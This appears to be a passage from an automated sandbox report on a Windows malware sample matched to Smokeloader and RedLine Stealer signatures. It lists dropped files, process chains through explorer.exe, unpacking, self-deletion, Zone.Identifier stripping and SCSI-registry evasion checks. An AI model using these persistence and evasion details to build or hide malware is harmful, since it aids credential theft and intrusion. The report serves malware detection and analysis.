              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004014F8 NtAllocateVirtualMemory,12_2_004014F8
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_004014FB NtAllocateVirtualMemory,12_2_004014FB
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_004167C00_2_004167C0
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_004167C05_2_004167C0
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00416EC06_2_00416EC0
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0078D0D56_2_0078D0D5
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400078307_2_0000000140007830
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400134807_2_0000000140013480
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014001F0A07_2_000000014001F0A0
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014000D1107_2_000000014000D110
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400185147_2_0000000140018514
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014001ED807_2_000000014001ED80
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400109D07_2_00000001400109D0
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014000FA707_2_000000014000FA70
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400066A87_2_00000001400066A8
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014001F3947_2_000000014001F394
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014001EFB17_2_000000014001EFB1
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014001DFCC7_2_000000014001DFCC
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 12_2_00416EC012_2_00416EC0
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_00416EC013_2_00416EC0
              Source: C:\Users\user\AppData\Roaming\bbdeaecCode function: 13_2_004021E813_2_004021E8
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_004167C014_2_004167C0
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 14_2_004021E814_2_004021E8
              Source: HaPJ2rPP6w.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: HaPJ2rPP6w.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C12E.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: bbdeaec.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: wideaec.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.evad.winEXE@10/6@30/4
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014000C7F4 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,??2@YAPEAX_K@Z,lstrcpyW,lstrcpyW,??3@YAXPEAX@Z,LocalFree,7_2_000000014000C7F4
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014000121C GetDiskFreeSpaceExW,SendMessageW,7_2_000000014000121C
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00851503 CreateToolhelp32Snapshot,Module32First,0_2_00851503
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014000C438 GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,GetDlgItem,SetWindowLongPtrW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,7_2_000000014000C438
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_000000014000222C GetModuleHandleW,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,7_2_000000014000222C
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wideaecJump to behavior
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C12E.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecCommand line argument: `<@13_2_00403BB0
              Source: C:\Users\user\AppData\Roaming\wideaecCommand line argument: `<@14_2_00403BB0
              Source: HaPJ2rPP6w.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: HaPJ2rPP6w.exeReversingLabs: Detection: 34%
              Source: unknownProcess created: C:\Users\user\Desktop\HaPJ2rPP6w.exe "C:\Users\user\Desktop\HaPJ2rPP6w.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\wideaec C:\Users\user\AppData\Roaming\wideaec
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C12E.exe C:\Users\user\AppData\Local\Temp\C12E.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\89ED.exe C:\Users\user\AppData\Local\Temp\89ED.exe
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeProcess created: C:\Users\user\AppData\Local\Temp\89ED.exe "C:\Users\user\AppData\Local\Temp\89ED.exe" -sfxelevation
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\bbdeaec C:\Users\user\AppData\Roaming\bbdeaec
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\bbdeaec C:\Users\user\AppData\Roaming\bbdeaec
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\wideaec C:\Users\user\AppData\Roaming\wideaec
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C12E.exe C:\Users\user\AppData\Local\Temp\C12E.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\89ED.exe C:\Users\user\AppData\Local\Temp\89ED.exeJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSection loaded: gavosebisiv.dllJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecSection loaded: gavosebisiv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeSection loaded: gavosebisiv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecSection loaded: gavosebisiv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\bbdeaecSection loaded: msvcr100.dllJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeUnpacked PE file: 0.2.HaPJ2rPP6w.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xezuxe:W;.tls:W;.yuvatom:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\wideaecUnpacked PE file: 5.2.wideaec.400000.0.unpack .text:ER;.rdata:R;.data:W;.xezuxe:W;.tls:W;.yuvatom:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeUnpacked PE file: 6.2.C12E.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tasifal:W;.tls:W;.cuda:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\bbdeaecUnpacked PE file: 12.2.bbdeaec.400000.0.unpack .text:ER;.rdata:R;.data:W;.tasifal:W;.tls:W;.cuda:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400029DC LoadLibraryA,GetProcAddress,GetNativeSystemInfo,7_2_00000001400029DC
              Source: 89ED.exe.1.drStatic PE information: real checksum: 0xe565d should be: 0x1fc25b
              Source: HaPJ2rPP6w.exeStatic PE information: section name: .xezuxe
              Source: HaPJ2rPP6w.exeStatic PE information: section name: .yuvatom
              Source: C12E.exe.1.drStatic PE information: section name: .tasifal
              Source: C12E.exe.1.drStatic PE information: section name: .cuda
              Source: bbdeaec.1.drStatic PE information: section name: .tasifal
              Source: bbdeaec.1.drStatic PE information: section name: .cuda
              Source: wideaec.1.drStatic PE information: section name: .xezuxe
              Source: wideaec.1.drStatic PE information: section name: .yuvatom
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_006B1540 pushad ; ret 0_2_006B1550
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_0084E4EC pushad ; retf 0_2_0084E4ED
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00853DFC pushfd ; iretd 0_2_00853DFD
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_008532FF push B63524ADh; retn 001Fh0_2_00853336
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeCode function: 0_2_00854F5C push esp; ret 0_2_00854F5E
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_004031DB push eax; ret 5_2_004032AB
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_00631540 pushad ; ret 5_2_00631550
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_0071433C push esp; ret 5_2_0071433E
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_007131DC pushfd ; iretd 5_2_007131DD
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_007126DF push B63524ADh; retn 001Fh5_2_00712716
              Source: C:\Users\user\AppData\Roaming\wideaecCode function: 5_2_0070D4BC pushad ; retf 0070h5_2_0070D4BD
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0040100B push esi; ret 6_2_0040100C
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0040280E push esp; ret 6_2_004029C6
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0040281F push esp; ret 6_2_004029C6
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00402822 push esp; ret 6_2_004029C6
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00401328 push edi; retf 6_2_0040132A
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004027ED push esp; ret 6_2_004029C6
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_004027FB push esp; ret 6_2_004029C6
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_00792C2B push 9A832F1Fh; iretd 6_2_00792C31
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_0078D908 pushad ; retf 6_2_0078D965
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_007914BD push edi; retf 6_2_007914BE
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_007911A6 push esi; ret 6_2_007911A7
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02161909 push esp; iretd 6_2_021619BF
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02162854 push esp; ret 6_2_02162A2D
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02162875 push esp; ret 6_2_02162A2D
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02161072 push esi; ret 6_2_02161073
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02162862 push esp; ret 6_2_02162A2D
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeCode function: 6_2_02161386 push edi; retf 6_2_02161391
              Source: HaPJ2rPP6w.exeStatic PE information: section name: .text entropy: 7.50895133113937
              Source: C12E.exe.1.drStatic PE information: section name: .text entropy: 7.512866220320031
              Source: bbdeaec.1.drStatic PE information: section name: .text entropy: 7.512866220320031
              Source: wideaec.1.drStatic PE information: section name: .text entropy: 7.50895133113937
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bbdeaecJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wideaecJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C12E.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\89ED.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bbdeaecJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wideaecJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\hapj2rpp6w.exeJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wideaec:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\bbdeaec:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\wideaecKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
